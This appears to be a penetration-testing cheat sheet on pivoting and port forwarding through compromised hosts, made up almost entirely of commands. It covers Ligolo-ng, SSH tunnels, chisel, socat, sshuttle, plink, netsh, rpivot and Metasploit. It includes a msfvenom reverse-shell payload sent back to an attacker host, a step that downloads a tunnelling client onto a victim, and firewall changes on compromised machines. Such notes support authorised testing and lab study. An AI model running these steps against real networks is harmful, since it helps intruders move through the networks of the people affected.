Pivoting / Forwarding
00. Basic Enumerations
## ------------------| Check arp table
arp -an
01. Port Forwarding
01.0 Ligolo-ng
## ------------------| Agent [target/victim computer]
.\agent.exe -connect <MyIP>:11601 -ignore-cert
## ------------------| Server [My Computer]
sudo ip tuntap add user $USER mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert
session
ifconfig
sudo ip route add <IPRange>/24 dev ligolo
start
nmap <IP>
01.1 SSH Port Forward
## -N Do not execute a remote command. This is useful for just forwarding ports.
~C # do it as very first command
## ------------------| Local Port Forward
## Local Host <--> SSH Server <--> Remote Host
ssh -L <host_port>:<remote_ip>:<remote_port> <user>@<sshserverip>
## ex: ssh -L 3306:127.0.0.1:3306 [email protected]
## 3306 is victim's machine port
## 1337 is our machine port
ssh> -L 1337:127.0.0.1:3306
ssh -L 1337:127.0.0.1:3306 <user>@<machine_to_pivot>
## ------------------| Remote Port Forward
## Remote Host <--> SSH Server <--> Local Host
ssh -R <remote_port>:<remote_ip>:<host_port> <user>@<sshserverip>
## 3306 is victim's machine port
## 1337 is our machine port
ssh -R 1337:127.0.0.1:3306 <user>@<machine_to_pivot>
## ------------------| Dynamic Port Forward (Use of proxychain)
ssh> -D 1080
socks5 127.0.0.1 1080
## Config proxychain
sudo vi /etc/proxychains.conf
socks5 127.0.0.1 1080
## 1337 is our machine port
ssh -D 127.0.0.1:1080 <user>@<machine_to_pivot>
ssh -D 127.0.0.1:1080 -f -N <user>@<machine_to_pivot>
## Launch nmap
proxychains nmap -sT 172.16.1.0/24
01.2 Socat Multipurpose relay
## ------------------| Normal
socat TCP-LISTEN:4444,fork TCP:0.0.0.0:631
socat TCP-LISTEN:4444,fork,bind=10.10.14.26 TCP:127.0.0.1:3306
## ------------------| Send smb traffic from kali VM to windows VM
sudo socat TCP-LISTEN:445,fork,reuseaddr TCP:<WINDOWS_VM_IP>:445
01.3 Using Chisel
## ------------------| Normal
## Server side
./chisel server --reverse --port 1234
## Client side
./chisel client 10.10.14.26:1234 R:3000:127.0.0.1:3000 R:3001:127.0.0.1:3001
## ------------------| SOCKS5 (With Proxychains)
## Server side
chisel server --reverse --port 1234
## Client side
./chisel client 10.14.14.7:1234 R:0.0.0.0:1080:socks
## Edit /etc/proxychains.conf
socks5 127.0.0.1 1080
## Use nmap with proxychains
01.4 Using sshuttle
## ------------------| For all routes
sudo sshuttle -vvr [email protected] 0/0
sudo sshuttle -vr [email protected] 0/0 --ssh-cmd "ssh -i ./id_rsa"
sudo sshuttle -vr [email protected] 0.0.0.0/0 --ssh-cmd "ssh -i ./id_rsa"
sudo sshuttle -vr [email protected] 0.0.0.0/24 --ssh-cmd "ssh -i ./id_rsa"
## ------------------| For specific route
sudo sshuttle -vr [email protected] 172.16.1.0/24 --ssh-cmd "ssh -i ./id_rsa"
01.5 Using ncat tunnel
## ------------------| Set ncat for target machine
ncat -vv --listen 1337 --proxy-type http
## ------------------| Edit on the attacker machine (10.10.110.100 is the IP of my ssh machine)
echo "http\t 10.10.110.100 \t1337" >> /etc/proxychains.conf
# To verify
tail -2 /etc/proxychains.conf
## ------------------| Then use proxychains
proxychains nmap -sT 172.16.1.0/24
01.6 Using httptunnel
## ------------------| On Server
hts --forward-port localhost:3306 1337
## ------------------| On Client
htc --forward-port 3306 <compromised_ip>:1337
01.7 Using Plink.exe
cp /usr/share/windows-resources/binaries/plink.exe .
.\plink.exe root@<OURIP> -R 445:127.0.0.1:455
cmd.exe /c echo y | plink.exe -ssh -l <USER> -pw <PASSWORD> -R <our_ip>:1337:127.0.01:3306 <our_ip>
01.8 Using netsh.exe
## 3306 is victim's machine port
## 1337 is compromised machine port
netsh interface portproxy add v4tov4 listenport=1337 listenaddress=<compromised_ip> connectport=3306 connectaddress=<remote_ip>
## Add firewall rule
netsh advfirewall firewall add rule name="forward_port" protocol=TCP dir=in localip=<compromised_ip> localport=4545 action=allow
01.9 Using rinetd
## ------------------| Forword my google.com traffic to resticted device
sudo vi /etc/rinetd.conf
### Jump to line number 19 and add following line
0.0.0.0 80 <GoogleIPAddress> 80
### Restart service
sudo service rinetd restart
### Success ? (on resticted machine)
nc -znv <AttackerIP> 80
01.10 Using rpivot.exe [Best for Windows XP]
## ------------------| Start server on attacker machine
git clone https://github.com/klsecservices/rpivot.git && cd rpivot
python2 server.py --server-ip 0.0.0.0 --server-port 8989
## ------------------| Start rpivot on compromised machine
wget https://github.com/klsecservices/rpivot/releases/download/v1.0/client.exe
.\client.exe --server-ip <IP> --server-port 8989
## ------------------| Proxy
/etc/proxychains.conf
socks4 127.0.0.1 1080
proxychains nmap -sT -p 80 <IP>
01.11 Using Metasploit with Meterpreter
## ------------------| Create payload
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<MyIP> LPORT=7799 -f elf -o msf.bin
## ------------------| Launch MSFConsole
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lport 7799
set lhost 10.10.14.13
run -j
sessions -i
## ------------------| Methord 0x01
route add <Compromised_IP_Address/24> <meterpreter_session_id>
## --> ex : route add 172.17.0.0/24 1
use auxiliary/server/socks_proxy
set SRVPORT 1080 # edit this port on /etc/proxychains.conf (socks5)
run
## ------------------| Methord 0x02
## !! You must be on " meterpreter > " shell
portfwd add -l 8003 -p 3306 -r 172.17.0.2
## -l (8003) is listening us
## -p (3306) this port running on compromised machine
## -r (172.17.0.1) compromised ip address
## then you can use 127.0.0.1:8003 from your end
Last updated